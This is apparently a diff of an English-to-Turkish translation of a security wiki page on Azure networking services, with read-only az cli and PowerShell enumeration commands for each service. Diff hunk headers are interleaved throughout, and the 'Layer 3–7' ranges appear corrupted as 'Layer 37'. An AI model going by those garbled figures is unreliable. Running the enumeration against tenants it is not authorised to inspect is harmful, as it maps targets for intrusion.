- **Alt Ağ-1:** 10.0.0.0/24 web sunucuları için.
- **Alt Ağ-2:** 10.0.1.0/24 veritabanı sunucuları için.
### Enumeration
### Sayım
To list all the VNets and subnets in an Azure account, you can use the Azure Command-Line Interface (CLI). Here are the steps:
Bir Azure hesabındaki tüm VNets ve alt ağları listelemek için Azure Komut Satırı Arayüzü (CLI) kullanabilirsiniz. İşte adımlar:
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List VNets
az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"
@@ -34,10 +33,8 @@ az network vnet list --query "[].{name:name, location:location, addressSpace:add
# List subnets of a VNet
az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, addressPrefix:addressPrefix}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List VNets
Get-AzVirtualNetwork | Select-Object Name, Location, @{Name="AddressSpace"; Expression={$_.AddressSpace.AddressPrefixes}}
@@ -47,26 +44,24 @@ Get-AzVirtualNetwork -ResourceGroupName <ResourceGroupName> -Name <VNetName> |
Select-Object -ExpandProperty Subnets |
Select-Object Name, AddressPrefix
```
{{#endtab }}
{{#endtabs }}
## Network Security Groups (NSG)
## Ağ Güvenlik Grupları (NSG)
A **Network Security Group (NSG)** filters network traffic both to and from Azure resources within an Azure Virtual Network (VNet). It houses a set of **security rules** that can indicate **which ports to open for inbound and outbound traffic** by source port, source IP, port destination and it's possible to assign a priority (the lower the priority number, the higher the priority).
Bir **Ağ Güvenlik Grubu (NSG)**, Azure Sanal Ağı (VNet) içindeki Azure kaynaklarına giden ve gelen ağ trafiğini filtreler. **Güvenlik kuralları** setini barındırır ve bu kurallar, kaynak portu, kaynak IP, port hedefi ile **gelen ve giden trafik için hangi portların açılacağını** belirtebilir ve bir öncelik atamak mümkündür (öncelik numarası ne kadar düşükse, öncelik o kadar yüksektir).
NSGs can be associated to **subnets and NICs.**
NSG'ler **alt ağlar ve NIC'ler** ile ilişkilendirilebilir.
**Rules example:**
**Kural örneği:**
- An inbound rule allowing HTTP traffic (port 80) from any source to your web servers.
- An outbound rule allowing only SQL traffic (port 1433) to a specific destination IP address range.
- Herhangi bir kaynaktan web sunucularınıza HTTP trafiğine (port 80) izin veren bir gelen kural.
- Belirli bir hedef IP adresi aralığına yalnızca SQL trafiğine (port 1433) izin veren bir giden kural.
### Enumeration
### Sayım
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List NSGs
az network nsg list --query "[].{name:name, location:location}" -o table
@@ -78,10 +73,8 @@ az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupNam
# Get NICs and subnets using this NSG
az network nsg show --name MyLowCostVM-nsg --resource-group Resource_Group_1 --query "{subnets: subnets, networkInterfaces: networkInterfaces}"
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List NSGs
Get-AzNetworkSecurityGroup | Select-Object Name, Location
@@ -93,31 +86,29 @@ Get-AzNetworkSecurityGroup -Name <NSGName> -ResourceGroupName <ResourceGroupName
# Get NICs and subnets using this NSG
(Get-AzNetworkSecurityGroup -Name <NSGName> -ResourceGroupName <ResourceGroupName>).Subnets
```
{{#endtab }}
{{#endtabs }}
## Azure Firewall
Azure Firewall is a **managed network security service** in Azure that protects cloud resources by inspecting and controlling traffic. It is a **stateful firewall** that filters traffic based on rules for Layers 3 to 7, supporting communication both **within Azure** (east-west traffic) and **to/from external networks** (north-south traffic). Deployed at the **Virtual Network (VNet) level**, it provides centralized protection for all subnets in the VNet. Azure Firewall automatically scales to handle traffic demands and ensures high availability without requiring manual setup.
Azure Firewall, bulut kaynaklarını trafiği denetleyerek ve inceleyerek koruyan **yönetilen bir ağ güvenlik hizmetidir**. **Durum bilgisi olan bir güvenlik duvarıdır** ve 3. ile 7. katmanlar arasındaki kurallara göre trafiği filtreler, hem **Azure içinde** (doğu-batı trafiği) hem de **dış ağlara/ dış ağlardan** (kuzey-güney trafiği) iletişimi destekler. **Sanal Ağ (VNet) düzeyinde** dağıtılır ve VNet'teki tüm alt ağlar için merkezi koruma sağlar. Azure Firewall, trafik taleplerini karşılamak için otomatik olarak ölçeklenir ve manuel kurulum gerektirmeden yüksek kullanılabilirlik sağlar.
It is available in three SKUs—**Basic**, **Standard**, and **Premium**, each tailored for specific customer needs:
Üç SKU'da mevcuttur—**Temel**, **Standart** ve **Premium**, her biri belirli müşteri ihtiyaçlarına göre özelleştirilmiştir:
| **Recommended Use Case** | Small/Medium Businesses (SMBs) with limited needs | General enterprise use, Layer 37 filtering | Highly sensitive environments (e.g., payment processing) |
| ------------------------------ | ------------------------------------------------- | ------------------------------------------- | --------------------------------------------------------- |
| **Performance** | Up to 250 Mbps throughput | Up to 30 Gbps throughput | Up to 100 Gbps throughput |
| **Threat Intelligence** | Alerts only | Alerts and blocking (malicious IPs/domains) | Alerts and blocking (advanced threat intelligence) |
| **L3L7 Filtering** | Basic filtering | Stateful filtering across protocols | Stateful filtering with advanced inspection |
| **Advanced Threat Protection** | Not available | Threat intelligence-based filtering | Includes Intrusion Detection and Prevention System (IDPS) |
| **TLS Inspection** | Not available | Not available | Supports inbound/outbound TLS termination |
| **Availability** | Fixed backend (2 VMs) | Autoscaling | Autoscaling |
| **Ease of Management** | Basic controls | Managed via Firewall Manager | Managed via Firewall Manager |
| **Tavsiye Edilen Kullanım Durumu** | Sınırlı ihtiyaçlara sahip Küçük/Orta Ölçekli İşletmeler (KOBİ'ler) | Genel kurumsal kullanım, 37. katman filtreleme | Son derece hassas ortamlar (örneğin, ödeme işleme) |
| ----------------------------------- | --------------------------------------------------------------- | ------------------------------------------------ | --------------------------------------------------- |
| **Performans** | 250 Mbps'ye kadar verim | 30 Gbps'ye kadar verim | 100 Gbps'ye kadar verim |
| **Tehdit İstihbaratı** | Sadece uyarılar | Uyarılar ve engelleme (kötü niyetli IP'ler/alan adları) | Uyarılar ve engelleme (gelişmiş tehdit istihbaratı) |
| **L3L7 Filtreleme** | Temel filtreleme | Protokoller arasında durum bilgisi olan filtreleme | Gelişmiş inceleme ile durum bilgisi olan filtreleme |
| **Gelişmiş Tehdit Koruması** | Mevcut değil | Tehdit istihbaratına dayalı filtreleme | Saldırı Tespit ve Önleme Sistemi (IDPS) içerir |
| **TLS İncelemesi** | Mevcut değil | Mevcut değil | Gelen/giden TLS sonlandırmasını destekler |
| **Kullanılabilirlik** | Sabit arka uç (2 VM) | Otomatik ölçeklendirme | Otomatik ölçeklendirme |
| **Yönetim Kolaylığı** | Temel kontroller | Güvenlik Duvarı Yöneticisi aracılığıyla yönetilir | Güvenlik Duvarı Yöneticisi aracılığıyla yönetilir |
### Enumeration
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List Azure Firewalls
az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table
@@ -131,10 +122,8 @@ az network firewall application-rule collection list --firewall-name <FirewallNa
# Get nat rules of a firewall
az network firewall nat-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List Azure Firewalls
Get-AzFirewall
@@ -148,21 +137,19 @@ Get-AzFirewall
# Get nat rules of a firewall
(Get-AzFirewall -Name <FirewallName> -ResourceGroupName <ResourceGroupName>).NatRuleCollections
```
{{#endtab }}
{{#endtabs }}
## Azure Route Tables
## Azure Yönlendirme Tabloları
Azure **Route Tables** are used to control the routing of network traffic within a subnet. They define rules that specify how packets should be forwarded, either to Azure resources, the internet, or a specific next hop like a Virtual Appliance or Azure Firewall. You can associate a route table with a **subnet**, and all resources within that subnet will follow the routes in the table.
Azure **Yönlendirme Tabloları**, bir alt ağ içindeki ağ trafiğinin yönlendirilmesini kontrol etmek için kullanılır. Paketlerin nasıl iletileceğini belirten kurallar tanımlar; bu, Azure kaynaklarına, internete veya bir Sanal Cihaz veya Azure Güvenlik Duvarı gibi belirli bir sonraki adrese olabilir. Bir yönlendirme tablosunu bir **alt ağ** ile ilişkilendirebilirsiniz ve o alt ağ içindeki tüm kaynaklar tablodaki yönlendirmeleri takip eder.
**Example:** If a subnet hosts resources that need to route outbound traffic through a Network Virtual Appliance (NVA) for inspection, you can create a **route** in a route table to redirect all traffic (e.g., `0.0.0.0/0`) to the NVA's private IP address as the next hop.
**Örnek:** Eğer bir alt ağ, dışa doğru trafiği inceleme için bir Ağ Sanal Cihazı (NVA) üzerinden yönlendirmesi gereken kaynakları barındırıyorsa, tüm trafiği (örneğin, `0.0.0.0/0`) NVA'nın özel IP adresine yönlendirmek için bir yönlendirme tablosunda bir **yönlendirme** oluşturabilirsiniz.
### **Enumeration**
### **Numaralandırma**
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List Route Tables
az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
@@ -170,10 +157,8 @@ az network route-table list --query "[].{name:name, resourceGroup:resourceGroup,
# List routes for a table
az network route-table route list --route-table-name <RouteTableName> --resource-group <ResourceGroupName> --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List Route Tables
Get-AzRouteTable
@@ -181,28 +166,26 @@ Get-AzRouteTable
# List routes for a table
(Get-AzRouteTable -Name <RouteTableName> -ResourceGroupName <ResourceGroupName>).Routes
```
{{#endtab }}
{{#endtabs }}
## Azure Private Link
## Azure Özel Bağlantı
Azure Private Link is a service in Azure that **enables private access to Azure services** by ensuring that **traffic between your Azure virtual network (VNet) and the service travels entirely within Microsoft's Azure backbone network**. It effectively brings the service into your VNet. This setup enhances security by not exposing the data to the public internet.
Azure Özel Bağlantı, **Azure hizmetlerine özel erişim sağlamayı** mümkün kılan bir hizmettir ve **Azure sanal ağınız (VNet) ile hizmet arasındaki trafiğin tamamen Microsoft'un Azure omurga ağı içinde seyahat etmesini sağlar**. Bu yapı, hizmeti VNet'inize getirir. Bu kurulum, verileri genel internete maruz bırakmadığı için güvenliği artırır.
Private Link can be used with various Azure services, like Azure Storage, Azure SQL Database, and custom services shared via Private Link. It provides a secure way to consume services from within your own VNet or even from different Azure subscriptions.
Özel Bağlantı, Azure Depolama, Azure SQL Veritabanı ve Özel Bağlantı aracılığıyla paylaşılan özel hizmetler gibi çeşitli Azure hizmetleri ile kullanılabilir. Kendi VNet'inizden veya farklı Azure aboneliklerinden hizmetleri güvenli bir şekilde tüketmenin bir yolunu sunar.
> [!CAUTION]
> NSGs do not apply to private endpoints, which clearly means that associating an NSG with a subnet that contains the Private Link will have no effect.
> NSG'ler özel uç noktalara uygulanmaz, bu da bir NSG'yi Özel Bağlantıyı içeren bir alt ağa ilişkilendirmenin hiçbir etkisi olmayacağı anlamına gelir.
**Example:**
**Örnek:**
Consider a scenario where you have an **Azure SQL Database that you want to access securely from your VNet**. Normally, this might involve traversing the public internet. With Private Link, you can create a **private endpoint in your VNet** that connects directly to the Azure SQL Database service. This endpoint makes the database appear as though it's part of your own VNet, accessible via a private IP address, thus ensuring secure and private access.
VNet'inizden güvenli bir şekilde erişmek istediğiniz **bir Azure SQL Veritabanı** olduğunu düşünün. Normalde, bu genel internet üzerinden geçiş yapmayı gerektirebilir. Özel Bağlantı ile, Azure SQL Veritabanı hizmetine doğrudan bağlanan **VNet'inizde bir özel uç nokta oluşturabilirsiniz**. Bu uç nokta, veritabanını kendi VNet'inizin bir parçasıymış gibi gösterir ve özel bir IP adresi aracılığıyla erişilebilir hale getirir, böylece güvenli ve özel erişim sağlanır.
### **Enumeration**
### **Sıralama**
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List Private Link Services
az network private-link-service list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
@@ -210,10 +193,8 @@ az network private-link-service list --query "[].{name:name, location:location,
# List Private Endpoints
az network private-endpoint list --query "[].{name:name, location:location, resourceGroup:resourceGroup, privateLinkServiceConnections:privateLinkServiceConnections}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List Private Link Services
Get-AzPrivateLinkService | Select-Object Name, Location, ResourceGroupName
@@ -221,23 +202,21 @@ Get-AzPrivateLinkService | Select-Object Name, Location, ResourceGroupName
# List Private Endpoints
Get-AzPrivateEndpoint | Select-Object Name, Location, ResourceGroupName, PrivateEndpointConnections
```
{{#endtab }}
{{#endtabs }}
## Azure Service Endpoints
## Azure Servis Uç Noktaları
Azure Service Endpoints extend your virtual network private address space and the identity of your VNet to Azure services over a direct connection. By enabling service endpoints, **resources in your VNet can securely connect to Azure services**, like Azure Storage and Azure SQL Database, using Azure's backbone network. This ensures that the **traffic from the VNet to the Azure service stays within the Azure network**, providing a more secure and reliable path.
Azure Servis Uç Noktaları, sanal ağınızın özel adres alanını ve VNet'inizin kimliğini doğrudan bir bağlantı üzerinden Azure hizmetlerine genişletir. Servis uç noktalarını etkinleştirerek, **VNet'inizdeki kaynaklar Azure hizmetlerine güvenli bir şekilde bağlanabilir**, Azure Depolama ve Azure SQL Veritabanı gibi, Azure'un omurga ağı kullanılarak. Bu, **VNet'ten Azure hizmetine giden trafiğin Azure ağı içinde kalmasını sağlar**, daha güvenli ve güvenilir bir yol sunar.
**Example:**
**Örnek:**
For instance, an **Azure Storage** account by default is accessible over the public internet. By enabling a **service endpoint for Azure Storage within your VNet**, you can ensure that only traffic from your VNet can access the storage account. The storage account firewall can then be configured to accept traffic only from your VNet.
Örneğin, bir **Azure Depolama** hesabı varsayılan olarak genel internet üzerinden erişilebilir. **VNet'iniz içinde Azure Depolama için bir servis uç noktası etkinleştirerek**, yalnızca VNet'inizden gelen trafiğin depolama hesabına erişmesini sağlayabilirsiniz. Depolama hesabı güvenlik duvarı, yalnızca VNet'inizden gelen trafiği kabul edecek şekilde yapılandırılabilir.
### **Enumeration**
### **Numaralandırma**
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List Virtual Networks with Service Endpoints
az network vnet list --query "[].{name:name, location:location, serviceEndpoints:serviceEndpoints}" -o table
@@ -245,10 +224,8 @@ az network vnet list --query "[].{name:name, location:location, serviceEndpoints
# List Subnets with Service Endpoints
az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, serviceEndpoints:serviceEndpoints}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List Virtual Networks with Service Endpoints
Get-AzVirtualNetwork
@@ -256,49 +233,47 @@ Get-AzVirtualNetwork
# List Subnets with Service Endpoints
(Get-AzVirtualNetwork -ResourceGroupName <ResourceGroupName> -Name <VNetName>).Subnets
```
{{#endtab }}
{{#endtabs }}
### Differences Between Service Endpoints and Private Links
### Service Endpoint'leri ve Özel Bağlantılar Arasındaki Farklar
Microsoft recommends using Private Links in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-network/vnet-integration-for-azure-services#compare-private-endpoints-and-service-endpoints):
Microsoft, [**docs**](https://learn.microsoft.com/en-us/azure/virtual-network/vnet-integration-for-azure-services#compare-private-endpoints-and-service-endpoints) sayfasında Özel Bağlantıların kullanılmasını önermektedir:
<figure><img src="../../../../images/image (25).png" alt=""><figcaption></figcaption></figure>
**Service Endpoints:**
**Service Endpoint'leri:**
- Traffic from your VNet to the Azure service travels over the Microsoft Azure backbone network, bypassing the public internet.
- The endpoint is a direct connection to the Azure service and does not provide a private IP for the service within the VNet.
- The service itself is still accessible via its public endpoint from outside your VNet unless you configure the service firewall to block such traffic.
- It's a one-to-one relationship between the subnet and the Azure service.
- Less expensive than Private Links.
- VNet'inizden Azure hizmetine giden trafik, kamu internetini atlayarak Microsoft Azure omurga ağı üzerinden geçer.
- Uç nokta, Azure hizmetine doğrudan bir bağlantıdır ve VNet içinde hizmet için özel bir IP sağlamaz.
- Hizmet, VNet'inizden dışarıda, kamu uç noktası aracılığıyla hala erişilebilir, aksi takdirde hizmet güvenlik duvarını bu tür trafiği engelleyecek şekilde yapılandırmadığınız sürece.
- Alt ağ ile Azure hizmeti arasında bire bir ilişki vardır.
- Özel Bağlantılardan daha az maliyetlidir.
**Private Links:**
**Özel Bağlantılar:**
- Private Link maps Azure services into your VNet via a private endpoint, which is a network interface with a private IP address within your VNet.
- The Azure service is accessed using this private IP address, making it appear as if it's part of your network.
- Services connected via Private Link can be accessed only from your VNet or connected networks; there's no public internet access to the service.
- It enables a secure connection to Azure services or your own services hosted in Azure, as well as a connection to services shared by others.
- It provides more granular access control via a private endpoint in your VNet, as opposed to broader access control at the subnet level with service endpoints.
- Özel Bağlantı, Azure hizmetlerini VNet'inize özel bir uç nokta aracılığıyla haritalar; bu, VNet'iniz içinde özel bir IP adresine sahip bir ağ arayüzüdür.
- Azure hizmetine bu özel IP adresi kullanılarak erişilir, bu da onu ağınızın bir parçası gibi gösterir.
- Özel Bağlantı aracılığıyla bağlanan hizmetlere yalnızca VNet'inizden veya bağlı ağlardan erişilebilir; hizmete kamu internet erişimi yoktur.
- Azure hizmetlerine veya Azure'da barındırılan kendi hizmetlerinize güvenli bir bağlantı sağlar ve başkaları tarafından paylaşılan hizmetlere de bağlantı sağlar.
- VNet'inizde özel bir uç nokta aracılığıyla daha ayrıntılı erişim kontrolü sağlar; bu, hizmet uç noktaları ile alt ağ düzeyinde daha geniş erişim kontrolüne kıyasla.
In summary, while both Service Endpoints and Private Links provide secure connectivity to Azure services, **Private Links offer a higher level of isolation and security by ensuring that services are accessed privately without exposing them to the public internet**. Service Endpoints, on the other hand, are easier to set up for general cases where simple, secure access to Azure services is required without the need for a private IP in the VNet.
Özetle, hem Service Endpoint'leri hem de Özel Bağlantılar Azure hizmetlerine güvenli bağlantı sağlarken, **Özel Bağlantılar, hizmetlerin kamu internetine maruz kalmadan özel olarak erişilmesini sağlayarak daha yüksek bir izolasyon ve güvenlik seviyesi sunar**. Öte yandan, Service Endpoint'leri, VNet içinde özel bir IP gerektirmeden Azure hizmetlerine basit ve güvenli erişim gereken genel durumlar için daha kolay bir şekilde kurulabilir.
## Azure Front Door (AFD) & AFD WAF
**Azure Front Door** is a scalable and secure entry point for **fast delivery** of your global web applications. It **combines** various services like global **load balancing, site acceleration, SSL offloading, and Web Application Firewall (WAF)** capabilities into a single service. Azure Front Door provides intelligent routing based on the **closest edge location to the user**, ensuring optimal performance and reliability. Additionally, it offers URL-based routing, multiple-site hosting, session affinity, and application layer security.
**Azure Front Door**, **küresel web uygulamalarınızın hızlı teslimatı** için ölçeklenebilir ve güvenli bir giriş noktasıdır. **Küresel yük dengeleme, site hızlandırma, SSL yük dengelemesi ve Web Uygulama Güvenlik Duvarı (WAF)** yetenekleri gibi çeşitli hizmetleri tek bir hizmette **birleştirir**. Azure Front Door, **kullanıcıya en yakın kenar konumuna** dayalı akıllı yönlendirme sağlar, böylece optimal performans ve güvenilirlik sunar. Ayrıca, URL tabanlı yönlendirme, çoklu site barındırma, oturum bağlılığı ve uygulama katmanı güvenliği sunar.
**Azure Front Door WAF** is designed to **protect web applications from web-based attacks** without modification to back-end code. It includes custom rules and managed rule sets to protect against threats such as SQL injection, cross-site scripting, and other common attacks.
**Azure Front Door WAF**, **web tabanlı saldırılardan web uygulamalarını korumak** için tasarlanmıştır ve arka uç kodunda değişiklik gerektirmez. SQL enjeksiyonu, çapraz site betikleme ve diğer yaygın saldırılar gibi tehditlere karşı korumak için özel kurallar ve yönetilen kural setleri içerir.
**Example:**
**Örnek:**
Imagine you have a globally distributed application with users all around the world. You can use Azure Front Door to **route user requests to the nearest regional data center** hosting your application, thus reducing latency, improving user experience and **defending it from web attacks with the WAF capabilities**. If a particular region experiences downtime, Azure Front Door can automatically reroute traffic to the next best location, ensuring high availability.
Dünyanın dört bir yanında kullanıcıları olan küresel bir dağıtım uygulamanız olduğunu hayal edin. Azure Front Door'u kullanarak **kullanıcı isteklerini uygulamanızı barındıran en yakın bölgesel veri merkezine yönlendirebilirsiniz**, böylece gecikmeyi azaltır, kullanıcı deneyimini iyileştirir ve **WAF yetenekleri ile web saldırılarına karşı savunursunuz**. Belirli bir bölge kesinti yaşarsa, Azure Front Door trafiği otomatik olarak bir sonraki en iyi konuma yönlendirebilir, böylece yüksek kullanılabilirlik sağlar.
### Enumeration
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List Azure Front Door Instances
az network front-door list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
@@ -306,10 +281,8 @@ az network front-door list --query "[].{name:name, resourceGroup:resourceGroup,
# List Front Door WAF Policies
az network front-door waf-policy list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List Azure Front Door Instances
Get-AzFrontDoor
@@ -317,58 +290,52 @@ Get-AzFrontDoor
# List Front Door WAF Policies
Get-AzFrontDoorWafPolicy -Name <policyName> -ResourceGroupName <resourceGroupName>
```
{{#endtab }}
{{#endtabs }}
## Azure Application Gateway and Azure Application Gateway WAF
## Azure Uygulama Geçidi ve Azure Uygulama Geçidi WAF
Azure Application Gateway is a **web traffic load balancer** that enables you to manage traffic to your **web** applications. It offers **Layer 7 load balancing, SSL termination, and web application firewall (WAF) capabilities** in the Application Delivery Controller (ADC) as a service. Key features include URL-based routing, cookie-based session affinity, and secure sockets layer (SSL) offloading, which are crucial for applications that require complex load-balancing capabilities like global routing and path-based routing.
Azure Uygulama Geçidi, **web** uygulamalarınıza trafik yönetmenizi sağlayan bir **web trafiği yük dengeleyici**dir. **Katman 7 yük dengeleme, SSL sonlandırma ve web uygulama güvenlik duvarı (WAF) yetenekleri** sunar. Ana özellikler arasında URL tabanlı yönlendirme, çerez tabanlı oturum bağlılığı ve güvenli soket katmanı (SSL) yük dengelemesi bulunur; bu özellikler, küresel yönlendirme ve yol tabanlı yönlendirme gibi karmaşık yük dengeleme yetenekleri gerektiren uygulamalar için kritik öneme sahiptir.
**Example:**
**Örnek:**
Consider a scenario where you have an e-commerce website that includes multiple subdomains for different functions, such as user accounts and payment processing. Azure Application Gateway can **route traffic to the appropriate web servers based on the URL path**. For example, traffic to `example.com/accounts` could be directed to the user accounts service, and traffic to `example.com/pay` could be directed to the payment processing service.\
And **protect your website from attacks using the WAF capabilities.**
Bir e-ticaret web siteniz olduğunu ve kullanıcı hesapları ile ödeme işlemleri gibi farklı işlevler için birden fazla alt alan adı içerdiğini düşünün. Azure Uygulama Geçidi, **URL yolu temelinde uygun web sunucularına trafiği yönlendirebilir**. Örneğin, `example.com/accounts` adresine gelen trafik kullanıcı hesapları hizmetine yönlendirilebilir ve `example.com/pay` adresine gelen trafik ödeme işleme hizmetine yönlendirilebilir.\
Ve **WAF yeteneklerini kullanarak web sitenizi saldırılardan koruyun.**
### **Enumeration**
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List the Web Application Firewall configurations for your Application Gateways
az network application-gateway waf-config list --gateway-name <AppGatewayName> --resource-group <ResourceGroupName> --query "[].{name:name, firewallMode:firewallMode, ruleSetType:ruleSetType, ruleSetVersion:ruleSetVersion}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List the Web Application Firewall configurations for your Application Gateways
(Get-AzApplicationGateway -Name <AppGatewayName> -ResourceGroupName <ResourceGroupName>).WebApplicationFirewallConfiguration
```
{{#endtab }}
{{#endtabs }}
## Azure Hub, Spoke & VNet Peering
**VNet Peering** is a networking feature in Azure that **allows different Virtual Networks (VNets) to be connected directly and seamlessly**. Through VNet peering, resources in one VNet can communicate with resources in another VNet using private IP addresses, **as if they were in the same network**.\
**VNet Peering can also used with a on-prem networks** by setting up a site-to-site VPN or Azure ExpressRoute.
**VNet Peering**, Azure'da **farklı Sanal Ağların (VNet'lerin) doğrudan ve kesintisiz bir şekilde bağlanmasını sağlayan** bir ağ özelliğidir. VNet peering aracılığıyla, bir VNet'teki kaynaklar, **sanki aynı ağdaymış gibi** başka bir VNet'teki kaynaklarla özel IP adresleri kullanarak iletişim kurabilir.\
**VNet Peering, yerel ağlarla da kullanılabilir**; bir site-to-site VPN veya Azure ExpressRoute kurarak.
**Azure Hub and Spoke** is a network topology used in Azure to manage and organize network traffic. **The "hub" is a central point that controls and routes traffic between different "spokes"**. The hub typically contains shared services such as network virtual appliances (NVAs), Azure VPN Gateway, Azure Firewall, or Azure Bastion. The **"spokes" are VNets that host workloads and connect to the hub using VNet peering**, allowing them to leverage the shared services within the hub. This model promotes clean network layout, reducing complexity by centralizing common services that multiple workloads across different VNets can use.
**Azure Hub ve Spoke**, Azure'da ağ trafiğini yönetmek ve organize etmek için kullanılan bir ağ topolojisidir. **"Hub", farklı "spokelar" arasındaki trafiği kontrol eden ve yönlendiren merkezi bir noktadır**. Hub genellikle ağ sanal cihazları (NVA'lar), Azure VPN Gateway, Azure Firewall veya Azure Bastion gibi paylaşılan hizmetleri içerir. **"Spokelar", iş yüklerini barındıran ve hub'a VNet peering kullanarak bağlanan VNNet'lerdir**, böylece hub içindeki paylaşılan hizmetlerden yararlanabilirler. Bu model, farklı VNNet'ler arasında birden fazla iş yükünün kullanabileceği ortak hizmetleri merkezileştirerek karmaşıklığı azaltarak temiz bir ağ düzenini teşvik eder.
> [!CAUTION] > **VNET pairing is non-transitive in Azure**, which means that if spoke 1 is connected to spoke 2 and spoke 2 is connected to spoke 3 then spoke 1 cannot talk directly to spoke 3.
> [!CAUTION] > **VNET eşleştirmesi Azure'da geçişken değildir**, bu da demektir ki, eğer spoke 1, spoke 2'ye bağlıysa ve spoke 2, spoke 3'e bağlıysa, spoke 1 doğrudan spoke 3 ile iletişim kuramaz.
**Example:**
**Örnek:**
Imagine a company with separate departments like Sales, HR, and Development, **each with its own VNet (the spokes)**. These VNets **require access to shared resources** like a central database, a firewall, and an internet gateway, which are all located in **another VNet (the hub)**. By using the Hub and Spoke model, each department can **securely connect to the shared resources through the hub VNet without exposing those resources to the public internet** or creating a complex network structure with numerous connections.
Satış, İK ve Geliştirme gibi ayrı departmanlara sahip bir şirketi hayal edin, **her birinin kendi VNet'i (spokelar)** vardır. Bu VNNet'ler, **bir merkezi veritabanı, bir güvenlik duvarı ve bir internet geçidi gibi paylaşılan kaynaklara erişim gerektirir**, bunların hepsi **başka bir VNet'te (hub)** bulunmaktadır. Hub ve Spoke modelini kullanarak, her departman **bu paylaşılan kaynaklara, o kaynakları kamu internetine maruz bırakmadan veya çok sayıda bağlantı ile karmaşık bir ağ yapısı oluşturmadan hub VNet aracılığıyla güvenli bir şekilde bağlanabilir**.
### Enumeration
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List all VNets in your subscription
az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}" -o table
@@ -379,10 +346,8 @@ az network vnet peering list --resource-group <ResourceGroupName> --vnet-name <V
# List Shared Resources (e.g., Azure Firewall) in the Hub
az network firewall list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List all VNets in your subscription
Get-AzVirtualNetwork
@@ -393,23 +358,21 @@ Get-AzVirtualNetwork
# List Shared Resources (e.g., Azure Firewall) in the Hub
Get-AzFirewall
```
{{#endtab }}
{{#endtabs }}
## Site-to-Site VPN
A Site-to-Site VPN in Azure allows you to **connect your on-premises network to your Azure Virtual Network (VNet)**, enabling resources such as VMs within Azure to appear as if they are on your local network. This connection is established through a **VPN gateway that encrypts traffic** between the two networks.
Azure'daki Site-to-Site VPN, **yerel ağınızı Azure Sanal Ağı (VNet) ile bağlamanıza** olanak tanır ve Azure içindeki VM'ler gibi kaynakların yerel ağınızda varmış gibi görünmesini sağlar. Bu bağlantı, iki ağ arasındaki trafiği **şifreleyen bir VPN geçidi aracılığıyla** kurulur.
**Example:**
**Örnek:**
A business with its main office located in New York has an on-premises data center that needs to connect securely to its VNet in Azure, which hosts its virtualized workloads. By setting up a **Site-to-Site VPN, the company can ensure encrypted connectivity between the on-premises servers and the Azure VMs**, allowing for resources to be accessed securely across both environments as if they were in the same local network.
Ana ofisi New York'ta bulunan bir işletmenin, Azure'daki VNet'ine güvenli bir şekilde bağlanması gereken yerel bir veri merkezi vardır; bu VNet, sanallaştırılmış iş yüklerini barındırmaktadır. **Site-to-Site VPN kurarak, şirket yerel sunucular ile Azure VM'leri arasında şifreli bir bağlantı sağlayabilir**, böylece kaynaklara her iki ortamda da sanki aynı yerel ağdaymış gibi güvenli bir şekilde erişilebilir.
### **Enumeration**
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List VPN Gateways
az network vnet-gateway list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
@@ -417,10 +380,8 @@ az network vnet-gateway list --query "[].{name:name, location:location, resource
# List VPN Connections
az network vpn-connection list --gateway-name <VpnGatewayName> --resource-group <ResourceGroupName> --query "[].{name:name, connectionType:connectionType, connectionStatus:connectionStatus}" -o table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# List VPN Gateways
Get-AzVirtualNetworkGateway -ResourceGroupName <ResourceGroupName>
@@ -428,41 +389,32 @@ Get-AzVirtualNetworkGateway -ResourceGroupName <ResourceGroupName>
# List VPN Connections
Get-AzVirtualNetworkGatewayConnection -ResourceGroupName <ResourceGroupName>
```
{{#endtab }}
{{#endtabs }}
## Azure ExpressRoute
Azure ExpressRoute is a service that provides a **private, dedicated, high-speed connection between your on-premises infrastructure and Azure data centers**. This connection is made through a connectivity provider, bypassing the public internet and offering more reliability, faster speeds, lower latencies, and higher security than typical internet connections.
